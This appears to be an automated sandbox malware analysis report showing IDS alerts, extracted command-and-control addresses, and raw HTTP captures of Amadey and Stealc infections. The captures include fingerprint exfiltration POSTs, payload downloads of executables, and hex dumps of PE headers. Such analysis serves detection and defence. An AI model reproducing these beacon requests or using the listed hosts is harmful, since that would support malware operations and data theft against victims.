Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then dec ecx	25_3_000003F084C04C56
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then dec ecx	25_3_000003F084C04C56

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 96MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49717 -> 31.41.244.10:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 31.41.244.10:80 -> 192.168.2.7:49717
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49720 -> 31.41.244.10:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49722 -> 31.41.244.10:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49727 -> 31.41.244.10:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49723 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49801 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49805 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49791 -> 185.215.113.100:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.100/e2b1563c6670f193.php
Source: Malware configuration extractor	IPs: 31.41.244.10

Source: global traffic

TCP traffic: 192.168.2.7:51311 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Sep 2024 07:58:05 GMTContent-Type: application/octet-streamContent-Length: 1756672Last-Modified: Fri, 06 Sep 2024 07:18:45 GMTConnection: keep-aliveETag: "66daacd5-1ace00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 60 66 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 66 00 00 04 00 00 e6 41 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 28 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6e 62 64 7a 6a 76 64 00 60 19 00 00 f0 4c 00 00 58 19 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 77 7a 72 79 77 63 64 00 10 00 00 00 50 66 00 00 04 00 00 00 a8 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 66 00 00 22 00 00 00 ac 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Sep 2024 07:58:09 GMTContent-Type: application/octet-streamContent-Length: 917504Last-Modified: Fri, 06 Sep 2024 07:10:16 GMTConnection: keep-aliveETag: "66daaad8-e0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 aa da 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 50 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 a5 ab 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 00 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 95 00 00 00 40 0d 00 00 96 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 8a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 36 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000026000&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000029001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Fri, 06 Sep 2024 07:18:45 GMTIf-None-Match: "66daacd5-1ace00"
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="hwid"E6126769D7323653143898------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="build"leva------BGDBAKFCFHCGDGCBAAKF--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000030001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="hwid"E6126769D7323653143898------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="build"leva------DAEBFHJKJEBFCBFHDAEG--
